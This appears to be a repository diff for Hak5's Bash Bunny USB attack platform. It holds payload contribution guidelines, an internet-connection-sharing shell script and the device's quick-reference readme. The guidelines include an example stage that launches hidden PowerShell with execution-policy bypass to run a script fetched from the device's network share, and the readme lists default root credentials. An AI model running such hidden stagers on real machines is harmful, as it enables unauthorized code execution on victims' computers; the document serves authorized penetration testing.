Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.
|
||||
|
||||
## Staged Payloads
|
||||
"Staged payloads" are payloads that **download** code from some resource external to the payload.txt.
|
||||
|
||||
While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is **not a CDN for deployment on target systems**.
|
||||
|
||||
Staged code should be copied to and hosted on an appropriate server for doing so **by the end user** - Github and this repository are simply resources for sharing code among developers and users.
|
||||
See: [GitHub acceptable use policies](https://docs.github.com/en/site-policy/acceptable-use-policies/github-acceptable-use-policies#5-site-access-and-safety)
|
||||
|
||||
Additionally, any source code that is intended to be staged **(by the end user on the appropriate infrastructure)** should be included in any payload submissions either in the comments of the payload itself or as a seperate file. **Links to staged code are unacceptable**; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.
|
||||
|
||||
### Including URLs
|
||||
URLs used for retrieving staged code should refer exclusively to **example.com** using a bash variable in any payload submissions [see Payload Configuration section below](https://github.com/hak5/usbrubberducky-payloads/blob/master/README.md#payload-configuration).
|
||||
|
||||
### Staged Example
|
||||
|
||||
**Example scenario: your payload downloads a script and the executes it on a target machine.**
|
||||
- Include the script in the directory with your payload
|
||||
- Provide instructions for the user to move the script to the appropriate hosting service.
|
||||
- Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script
|
||||
|
||||
[Simple Example of this style of payload](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/exfiltration/Printer-Recon)
|
||||
|
||||
## Payload Configuration
|
||||
Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained.
|
||||
In many cases, payloads will require some level of configuration **by the end payload user**.
|
||||
|
||||
- Abstract configuration(s) for ease of use. Use bash assignment variables where possible.
|
||||
- Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...
|
||||
- URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.
|
||||
- Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or "inline" where applicable.
|
||||
|
||||
```
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
... Payload Documentation...
|
||||
|
||||
# CONFIGURATION
|
||||
# REQUIRED - Provide URL used for Example
|
||||
MY_TARGET_URL="example.com"
|
||||
|
||||
# OPTIONAL - How long until payload starts; default 5s
|
||||
BOOT_DELAY="5000"
|
||||
|
||||
QUACK DELAY $BOOT_DELAY
|
||||
...
|
||||
QUACK STRING $MY_TARGET_URL
|
||||
...
|
||||
```
|
||||
|
||||
## Payload Documentation
|
||||
Payloads should begin with `#` bash comments specifying the title of the payload, the author, the target, and a brief description.
|
||||
|
||||
```
|
||||
Example:
|
||||
BEGINNING OF PAYLOAD
|
||||
|
||||
# Title: Example Payload
|
||||
# Author: Korben Dallas
|
||||
# Description: Opens hidden powershell and
|
||||
# Target: Windows 10
|
||||
# Props: Hak5, Darren Kitchen, Korben
|
||||
# Version: 1.0
|
||||
# Category: General
|
||||
```
|
||||
|
||||
|
||||
### Binaries
|
||||
Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.
|
||||
|
||||
|
||||
### Configuration Options
|
||||
Configurable options should be specified in variables at the top of the payload.txt file
|
||||
|
||||
# Options
|
||||
RESPONDER_OPTIONS="-w -r -d -P"
|
||||
LOOTDIR=/root/udisk/loot/quickcreds
|
||||
|
||||
### LED
|
||||
The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.
|
||||
|
||||
# Initialization
|
||||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
GET HOST_IP
|
||||
|
||||
# Attack
|
||||
LED ATTACK
|
||||
ATTACKMODE HID ECM_ETHERNET
|
||||
|
||||
### Stages and States
|
||||
Stages should be documented with comments
|
||||
|
||||
# Keystroke Injection Stage
|
||||
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
|
||||
GET HOST_IP
|
||||
LED STAGE1
|
||||
ATTACKMODE HID
|
||||
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
|
||||
|
||||
Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states.
|
||||
|
||||
<h1><a href="https://hak5.org/pages/policy">Legal</a></h1>
|
||||
|
||||
Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.
|
||||
|
||||
Bash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner.
|
||||
Bash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license)
|
||||
DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org.
|
||||
This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use.
|
||||
Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.
|
||||
|
||||
See also:
|
||||
|
||||
[Hak5 Software License Agreement](https://shop.hak5.org/pages/software-license-agreement)
|
||||
|
||||
[Terms of Service](https://shop.hak5.org/pages/terms-of-service)
|
||||
|
||||
# Disclaimer
|
||||
<h3><b>As with any script, you are advised to proceed with caution.</h3></b>
|
||||
<h3><b>Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.</h3></b>
|
||||
|
||||
321
bunny-connecter.sh
Executable file
321
bunny-connecter.sh
Executable file
@@ -0,0 +1,321 @@
|
||||
#!/bin/bash
|
||||
# Bash Bunny Connector for Linux
|
||||
# EULA https://www.bashbunny.com/licence/eula.txt
|
||||
# License https://www.bashbunny.com/licence/software_licence.txt
|
||||
|
||||
bbver=1
|
||||
BBSH_CONFIG="$(dirname $0)/bunny_connecter_config.txt"
|
||||
|
||||
if [ "$EUID" -ne 0 ]
|
||||
then echo "This Bash Bunny Connection script requires root."
|
||||
sudo su -s "$0"
|
||||
exit
|
||||
fi
|
||||
|
||||
function banner {
|
||||
# Show random banner because 1337
|
||||
b=$(( ( RANDOM % 5 ) + 1 ))
|
||||
case "$b" in
|
||||
1)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
2)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
3)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
4)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
5)
|
||||
echo $(tput setaf 3)
|
||||
echo " _____ _____ _____ _____ _____ _____ _____ _____ __ __ ";
|
||||
echo " (\___/) | __ || _ || __|| | | | __ || | || | || | || | |";
|
||||
echo " (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|";
|
||||
echo " (\")_(\") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| ";
|
||||
echo " Bash Bunny by Hak5 USB Attack/Automation Platform ";
|
||||
echo "$(tput sgr0) v$bbver";
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
function showsettings {
|
||||
printf "\n\
|
||||
$(tput bold)Saved Settings$(tput sgr0): Share Internet connection from $sbunnywan\n\
|
||||
to Bash Bunny at $sbunnylan through default gateway $sbunnygw\n"
|
||||
}
|
||||
|
||||
function menu {
|
||||
start_clean # removes bunny related rules without doing a full flush
|
||||
printf "\n\
|
||||
[$(tput bold)C$(tput sgr0)]onnect using saved settings\n\
|
||||
[$(tput bold)G$(tput sgr0)]uided setup (recommended)\n\
|
||||
[$(tput bold)M$(tput sgr0)]anual setup\n\
|
||||
[$(tput bold)A$(tput sgr0)]dvanced IP settings\n\
|
||||
[$(tput bold)Q$(tput sgr0)]uit\n\n "
|
||||
read -r -sn1 key
|
||||
case "$key" in
|
||||
[gG]) guidedsetup;;
|
||||
[mM]) manualsetup;;
|
||||
[cC]) connectsaved;;
|
||||
[aA]) advancedsetup;;
|
||||
[bB]) bunny;;
|
||||
[qQ]) printf "\n"; start_clean; exit;;
|
||||
esac
|
||||
}
|
||||
|
||||
function manualsetup {
|
||||
ipinstalled=$(which ip)
|
||||
if [[ "$?" == 0 ]]; then
|
||||
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
|
||||
printf "\n Select Bash Bunny Interface:\n"
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " [$(tput bold)%s$(tput sgr0)]\t%s\t" "$i" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " > " planq
|
||||
if [ "$planq" -eq "$planq" ] 2>/dev/null; then
|
||||
sbunnylan=(${ifaces[planq]})
|
||||
else
|
||||
printf "\n Response must be a listed numeric option\n"; manualsetup
|
||||
fi
|
||||
printf "\n Select Internet Interface:\n"
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " [$(tput bold)%s$(tput sgr0)]\t%s\t" "$i" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " > " inetq
|
||||
if [ "$inetq" -eq "$inetq" ] 2>/dev/null; then
|
||||
sbunnywan=(${ifaces[inetq]})
|
||||
else
|
||||
printf "\n Response must be a listed numeric option\n"; manualsetup
|
||||
fi
|
||||
printf "\n$(netstat -nr)\n\n"
|
||||
read -r -p " Specify Default Gateway IP Address: " sbunnygw
|
||||
savechanges
|
||||
else
|
||||
printf "\n\n Configuration requires the 'iproute2' package (aka the 'ip' command).\n Please install 'iproute2' to continue.\n"
|
||||
menu
|
||||
fi
|
||||
}
|
||||
|
||||
function guidedsetup {
|
||||
hasiproute2=$(which ip)
|
||||
if [[ "$?" == 1 ]]; then
|
||||
printf "\n\n Configuration requires the 'iproute2' package (aka the 'ip' command).\n Please install 'iproute2' to continue.\n"; menu
|
||||
fi
|
||||
hasdefaultroute=$(ip route)
|
||||
if [[ "$?" == 1 ]]; then
|
||||
printf "\n No route detected. Check connection and try again.\n"; menu
|
||||
fi
|
||||
|
||||
printf "\n $(tput setaf 3)Step 1 of 3: Select Default Gateway$(tput sgr0)\n\
|
||||
Default gateway reported as $(tput bold)$(ip route | grep default | awk {'print $3'} | head -1)$(tput sgr0)\n"
|
||||
read -r -p " Use the above reported default gateway? [Y/n]? " usedgw
|
||||
case $usedgw in
|
||||
[yY][eE][sS]|[yY]|'')
|
||||
sbunnygw=($(ip route | grep default | awk {'print $3'}))
|
||||
;;
|
||||
[nN][oO]|[nN])
|
||||
printf "\n$(ip route)\n\n"
|
||||
read -r -p " Specify the default gateway by IP address: " sbunnygw
|
||||
;;
|
||||
esac
|
||||
|
||||
printf "\n $(tput setaf 3)Step 2 of 3: Select Internet Interface$(tput sgr0)\n\
|
||||
Internet interface reported as $(tput bold)$(ip route | grep default | awk {'print $5'} | head -1)$(tput sgr0)\n"
|
||||
read -r -p " Use the above reported Internet interface? [Y/n]? " useii
|
||||
case $useii in
|
||||
[yY][eE][sS]|[yY]|'')
|
||||
sbunnywan=($(ip route | grep default | awk {'print $5'}))
|
||||
;;
|
||||
[nN][oO]|[nN])
|
||||
printf "\n Available Network Interfaces:\n"
|
||||
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " \t%s\t" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " Specify the internet interface by name: " sbunnywan
|
||||
;;
|
||||
esac
|
||||
|
||||
printf "\n $(tput setaf 3)Step 3 of 3: Select Bash Bunny Interface$(tput sgr0)\n Please connect the Bash Bunny to this computer.\n "
|
||||
|
||||
a="0"
|
||||
until bunnyiface=$(ip addr | grep '00:11:22:33:44:55' -B1 | awk {'print $2'} | head -1 | grep 'eth\|en')
|
||||
do
|
||||
printf "."
|
||||
sleep 1
|
||||
a=$[$a+1]
|
||||
if [[ $a == "51" ]]; then
|
||||
printf "\n "
|
||||
a=0
|
||||
fi
|
||||
done
|
||||
printf "[Checking]"
|
||||
sleep 5 # Wait as the system is likely to rename interface. Sleeping rather than more advanced error handling becasue reasons.
|
||||
bunnyiface=$(ip addr | grep '00:11:22:33:44:55' -B1 | awk {'print $2'} | head -1 | grep 'eth\|en' | sed 's/://g')
|
||||
printf "\n Detected Bash Bunny on interface $(tput bold)$bunnyiface$(tput sgr0)\n";
|
||||
read -r -p " Use the above detected Bash Bunny interface? [Y/n]? " pi
|
||||
case $pi in
|
||||
[yY][eE][sS]|[yY]|'')
|
||||
sbunnylan=$bunnyiface
|
||||
;;
|
||||
[nN][oO]|[nN])
|
||||
printf "\n Available Network Interfaces:\n"
|
||||
ifaces=($(ip link show | grep -v link | awk {'print $2'} | sed 's/://g' | grep -v lo))
|
||||
for i in "${!ifaces[@]}"; do
|
||||
printf " \t%s\t" "${ifaces[$i]}"
|
||||
printf "$(ip -4 addr show ${ifaces[$i]} | grep inet | awk {'print $2'} | head -1)\n"
|
||||
done
|
||||
read -r -p " Specify the Bash Bunny interface by name: " sbunnylan
|
||||
;;
|
||||
esac
|
||||
savechanges
|
||||
}
|
||||
|
||||
function advancedsetup {
|
||||
printf "\n\
|
||||
By default the Bash Bunny resides on the $(tput bold)172.16.64.0/24$(tput sgr0) network\n\
|
||||
with the IP Address $(tput bold)172.16.64.1$(tput sgr0) and Ethernet default route $(tput bold)172.16.64.64$(tput sgr0).\n\n\
|
||||
The Bash Bunny expects an Internet connection from 172.16.64.64 by\n\
|
||||
default, which this script aids in configuring. These IP addresses may\n\
|
||||
be changed if desired by modifying network configs on the Bash Bunny.\n\n"
|
||||
read -r -p " Continue with advanced IP config [y/N]? " qcontinue
|
||||
case $qcontinue in
|
||||
[nN][oO]|[nN]|'') menu ;;
|
||||
[yY][eE][sS]|[yY])
|
||||
read -r -p " Bash Bunny Network [172.16.42.0/24]: " sbunnynet
|
||||
if [[ $sbunnynet == '' ]]; then
|
||||
sbunnynet=172.16.64.0/24 # Bash Bunny network. Default is 172.16.64.0/24
|
||||
fi
|
||||
read -r -p " Bash Bunny Netmask [255.255.255.0]: " sbunnynmask
|
||||
if [[ $sbunnynmask == '' ]]; then
|
||||
sbunnynmask=255.255.255.0 #Default netmask for /24 network
|
||||
fi
|
||||
read -r -p " Host IP Address [172.16.42.42]: " sbunnyhostip
|
||||
if [[ $sbunnyhostip == '' ]]; then
|
||||
sbunnyhostip=172.16.64.64 #IP Address of host computer
|
||||
fi
|
||||
read -r -p " Bash Bunny IP Address [172.16.42.1]: " sbunnyip
|
||||
if [[ $sbunnyip == '' ]]; then
|
||||
sbunnyip=172.16.64.1 #If this seems familiar it's becuase I'm just recycling wp6.sh from the WiFi Pineapple
|
||||
fi
|
||||
printf "\n Advanced IP settings will be saved for future sessions.\n Default settings may be restored by selecting Advanced IP settings and\n pressing [ENTER] when prompted for IP settings.\n\n Press any key to continue"
|
||||
savechanges
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
function savechanges {
|
||||
# using ";" as a delmiter in sed is a-okay
|
||||
sed -i "s;^sbunnynmask.*;sbunnynmask=$sbunnynmask;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnynet.*;sbunnynet=$sbunnynet;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnylan.*;sbunnylan=$sbunnylan;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnywan.*;sbunnywan=$sbunnywan;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnygw.*;sbunnygw=$sbunnygw;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnyhostip.*;sbunnyhostip=$sbunnyhostip;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnyip.*;sbunnyip=$sbunnyip;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sfirsttime.*;sfirsttime=0;" "$BBSH_CONFIG"
|
||||
sfirsttime=0
|
||||
printf "\n Settings saved.\n"
|
||||
showsettings
|
||||
menu
|
||||
}
|
||||
|
||||
function connectsaved {
|
||||
if [[ "$sfirsttime" == "1" ]]; then
|
||||
printf "\n Error: Settings unsaved. Run either Guided or Manual setup first.\n"; menu
|
||||
fi
|
||||
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up #Bring up Ethernet Interface directly connected to Bash Bunny
|
||||
printf "Detecting Bash Bunny..."
|
||||
until ping $sbunnyip -c1 -w1 >/dev/null
|
||||
do
|
||||
printf "."
|
||||
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up &>/dev/null
|
||||
sleep 1
|
||||
done
|
||||
printf "...found.\n\n"
|
||||
printf " $(tput setaf 6) _ . $(tput sgr0) $(tput setaf 7)___$(tput sgr0) $(tput setaf 3)(\___/)$(tput sgr0)\n"
|
||||
printf " $(tput setaf 6) ( _ )_ $(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 7)[___]$(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 3)(='.'=)$(tput sgr0)\n"
|
||||
printf " $(tput setaf 6) (_ _(_ ,)$(tput sgr0) $(tput setaf 7)\___\\$(tput sgr0) $(tput setaf 3)(\")_(\")$(tput sgr0)\n"
|
||||
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up #Bring up Ethernet Interface directly connected to Pineapple
|
||||
echo '1' > /proc/sys/net/ipv4/ip_forward # Enable IP Forwarding
|
||||
iptables -I FORWARD -i $sbunnywan -o $sbunnylan -s $sbunnynet -m state --state NEW -j ACCEPT #setup IP forwarding
|
||||
iptables -I FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
|
||||
iptables -I POSTROUTING -t nat -s $sbunnyip -j MASQUERADE
|
||||
route del default #remove default route
|
||||
route add default gw $sbunnygw $sbunnywan #add default gateway
|
||||
printf "\n\n"
|
||||
exit
|
||||
}
|
||||
|
||||
function start_clean {
|
||||
# undo all iptables Bashbunny related rules
|
||||
iptables -D FORWARD -i $sbunnywan -o $sbunnylan -s $sbunnynet -m state --state NEW -j ACCEPT 2>/dev/null
|
||||
iptables -D FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT 2>/dev/null
|
||||
iptables -D POSTROUTING -t nat -s $sbunnyip -j MASQUERADE 2>/dev/null
|
||||
echo '0' > /proc/sys/net/ipv4/ip_forward # Disable forwarding
|
||||
}
|
||||
|
||||
function create_bbsh_config {
|
||||
echo "sbunnynmask=255.255.255.0" > "$BBSH_CONFIG"
|
||||
echo "sbunnynet=172.16.64.0/24" >> "$BBSH_CONFIG"
|
||||
echo "sbunnylan=enx001122334455" >> "$BBSH_CONFIG"
|
||||
echo "sbunnywan=wlo1" >> "$BBSH_CONFIG"
|
||||
echo "sbunnygw=192.168.1.1" >> "$BBSH_CONFIG"
|
||||
echo "sbunnyhostip=172.16.64.64" >> "$BBSH_CONFIG"
|
||||
echo "sbunnyip=172.16.64.1" >> "$BBSH_CONFIG"
|
||||
echo "sfirsttime=1" >> "$BBSH_CONFIG"
|
||||
}
|
||||
|
||||
function bunny {
|
||||
printf "\nNetmask $sbunnynmask\nBunny Net $sbunnynet\nBunny LAN $sbunnylan\nBunny WAN $sbunnywan\nBunny GW $sbunnygw\nBunny IP $sbunnyip\nHost IP $sbunnyhostip\n"
|
||||
printf "\n/)___(\ \n(='.'=)\n(\")_(\")\n"
|
||||
exit
|
||||
}
|
||||
|
||||
banner #remove for less 1337
|
||||
showsettings
|
||||
|
||||
# create bbsh_config if it doesn't exist
|
||||
[ -f "$BBSH_CONFIG" ] || create_bbsh_config
|
||||
source "$BBSH_CONFIG"
|
||||
|
||||
if [[ "$sfirsttime" == "1" ]]; then
|
||||
printf "
|
||||
Since this is the first time running the BB Internet Connection Sharing\n\
|
||||
script, Guided setup is recommended to save initial configuration.\n\
|
||||
Subsequent sessions may be quickly connected using saved settings.\n"
|
||||
fi
|
||||
|
||||
# Removes iptables rules if the script gets a Ctrl-C
|
||||
trap start_clean INT
|
||||
|
||||
menu
|
||||
@@ -1,3 +1,3 @@
|
||||
#!/bin/bash
|
||||
#This configuration file is used to set default variables
|
||||
DUCKY_LANG us
|
||||
DUCKY_LANG us
|
||||
|
||||
616
docs/readme.txt
616
docs/readme.txt
@@ -1,278 +1,338 @@
|
||||
|
||||
_____ _____ _____ _____ _____ _____ _____ _____ __ __
|
||||
(\___/) | __ || _ || __|| | | | __ || | || | || | || | |
|
||||
(='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _|
|
||||
(")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_|
|
||||
Bash Bunny by Hak5 USB Attack/Automation Platform
|
||||
|
||||
|
||||
-+- QUICK REFERENCE GUIDE v1.3 -+-
|
||||
|
||||
|
||||
+-----------------+
|
||||
+---- | The Bash Bunny by Hak5 is a simple and powerful
|
||||
| : | Boot Modes | multi-function USB attack and automation platform
|
||||
+---- * | for penetration testers and systems administrators.
|
||||
+--|||------------+
|
||||
|||
|
||||
||+-- (sw1) Switch Position 1: Customizeable Payload.
|
||||
|+-- (sw2) Switch Position 2: Customizeable Payload.
|
||||
+-- (sw3) Switch Position 3: Arming Mode - Serial + Mass Storage.
|
||||
|
||||
|
||||
|
||||
Welcome & Updating the Bash Bunny Software
|
||||
------------------------------------------------------------------------------
|
||||
Congratulations on your new Bash Bunny by Hak5! For the best experience, we
|
||||
recommend updating to the latest framework version and payload set from the
|
||||
downloads section of https://www.bashbunny.com. There you will find a wealth
|
||||
of knowledge and a helpful community of creative penetration testers and
|
||||
IT professionals. Welcome!
|
||||
|
||||
|
||||
|
||||
Mass-Storage Directory Structure Default Settings
|
||||
-------------------------------------------- -----------------------------
|
||||
.
|
||||
|-payloads/ Username: root
|
||||
| |-library/ Password: hak5bunny
|
||||
| | |-* Payloads from Bash Bunny repository
|
||||
| | |-extensions/ - Additional Bunny Script Hostname: bunny
|
||||
| | commands/functions.
|
||||
| |-switch1/ IP Address: 172.16.64.1
|
||||
| | |-payload.txt - Bunny Script executed on DHCP Range: 172.16.64.10-12
|
||||
| | boot in switch position 1
|
||||
| |-switch2/ LED Status:
|
||||
| |-payload.txt - Bunny Script executed on Green Solid - Boot up
|
||||
| boot in switch position 2 Blue Blink - Arming Mode
|
||||
|-loot/ - Where payloads store logs and data Red/Blue Blink - Recovery
|
||||
|-docs/ - EULA, License, this readme.txt
|
||||
|-tools/ - Contents placed here will be copied
|
||||
| to /tools at boot in arming mode.
|
||||
| *.deb packages will be installed.
|
||||
|-languages/ - HID languages placed here will
|
||||
install at boot in arming mode.
|
||||
|
||||
|
||||
|
||||
Partitions Recovery
|
||||
-------------------------------------- -------------------------------------
|
||||
/dev/root - Main Linux file system If the Bash Bunny Setup Mode fails to
|
||||
/dev/nandg - Recovery file systems boot >3 times the file system will
|
||||
do not modify recover automatically. DO NOT UNPLUG
|
||||
/dev/nandf - Mass storage partition while the LED is blinking in an
|
||||
Mounted at /root/udisk alternating Red/Blue pattern. This
|
||||
/root/udisk - Mass storage mount point process requires 5-10 minutes.
|
||||
|
||||
|
||||
|
||||
Bunny Script Builtin Commands Ducky Script
|
||||
----------------------------------------------------------- ---------------
|
||||
ATTACKMODE Specifies the USB devices to emulate. REM
|
||||
Accepts combinations of three: SERIAL, DELAY
|
||||
ECM_ETHERNET, RNDIS_ETHERNET, STORAGE, HID STRING
|
||||
WINDOWS/GUI
|
||||
LED Control the RGB LED. Accepts color and pattern MENU/APP
|
||||
or predefined payload state. SHIFT
|
||||
See detail from LED section. ALT
|
||||
CONTROL/CTRL
|
||||
QUACK Injects specified keystrokes via Ducky Script UPARROW/UP
|
||||
Accepts file relative to /payloads/ path DOWNARROW/DOWN
|
||||
Accepts inline Ducky Script LEFTARROW/LEFT
|
||||
RIGHTARROW/RIGHT
|
||||
Q Alias for QUACK PAUSE/BREAK
|
||||
DELETE
|
||||
Example: END
|
||||
QUACK helloworld.txt Inject keystrokes from file ESCAPE/ESC
|
||||
Q STRING Hello World Inject keystrokes from Ducky Script HOME
|
||||
INSERT
|
||||
DUCKY_LANG=us Sets keystroke injection language PAGEUP P
|
||||
PAGEDOWN
|
||||
PRINTSCREEN
|
||||
SPACE
|
||||
Bunny Script Environment Variables TAB
|
||||
---------------------------------------------------------- NUMLOCK
|
||||
$TARGET_IP IP Address of the computer received SCROLLOCK
|
||||
by the Bash Bunny DHCP Server. CAPSLOCK
|
||||
$TARGET_HOSTNAME Host name of the computer on the F1...F12
|
||||
Bash Bunny network.
|
||||
$HOST_IP IP Address of the Bash Bunny
|
||||
(Default: 172.16.64.1)
|
||||
$SWITCH_POSITION "switch1", "switch2" or "switch3"
|
||||
|
||||
|
||||
|
||||
Bash Bunny Extensions
|
||||
-----------------------------------------------------------------------------
|
||||
The Bash Bunny scripting language is further enhanced by additional commands,
|
||||
known as extensions. Sourced from payloads/library/extensions/* at run-time,
|
||||
payloads may make use of these command. Similar to payloads, the extensions
|
||||
can be obtain and updated from the Bash Bunny repository.
|
||||
|
||||
Example extension: RUN - Simplifies command execution for HID attacks.
|
||||
Usage: RUN [OS] [Command]
|
||||
RUN WIN notepad.exe
|
||||
RUN WIN "powershell -Exec Bypass \"tree c:\\ > tree.txt; type tree.txt\"
|
||||
RUN OSX http://www.example.com
|
||||
|
||||
|
||||
|
||||
Connecting to the Linux Serial Console from Windows Serial Settings
|
||||
--------------------------------------------------------- ---------------
|
||||
Find the COM# from Device Manager > Ports (COM & LPT) 115200/8N1
|
||||
Look for USB Serial Device (COM#). Example: COM3
|
||||
Or run the following powershell command to list ports: Baud: 115200
|
||||
[System.IO.Ports.SerialPort]::getportnames() Data Bits: 8
|
||||
Parity Bit: No
|
||||
Open Putty (putty.org) and select Serial. Enter COM# for Stop Bit: 1
|
||||
serial line and 115200 for Speed. Clock Open.
|
||||
|
||||
|
||||
|
||||
Connecting to the Linux Serial Console from Linux/Mac
|
||||
-----------------------------------------------------------------------------
|
||||
Find the device from the terminal with: "ls /dev/tty*" or "dmesg | grep tty"
|
||||
On Linux the Bash Bunny may be /dev/ttyUSB0 or /dev/ttyACM0
|
||||
Connect to the serial device with screen. (apt-get install screen if needed)
|
||||
Example: "sudo screen /dev/ttyACM0 115200"
|
||||
Disconnect with keyboard combo: CTRL+a followed by CTRL+\
|
||||
|
||||
|
||||
|
||||
Example Payload Structure
|
||||
-------------------------
|
||||
payloads/switch#/
|
||||
|-payload.txt Primary payload file executed on boot in
|
||||
| specified switch position
|
||||
|-readme.txt Optional payload documentation
|
||||
|-config.txt Optional payload configuration for variables
|
||||
| sourced by complex payloads
|
||||
|-install.sh Installation script for complex payloads
|
||||
| requiring initial setup (may require Internet)
|
||||
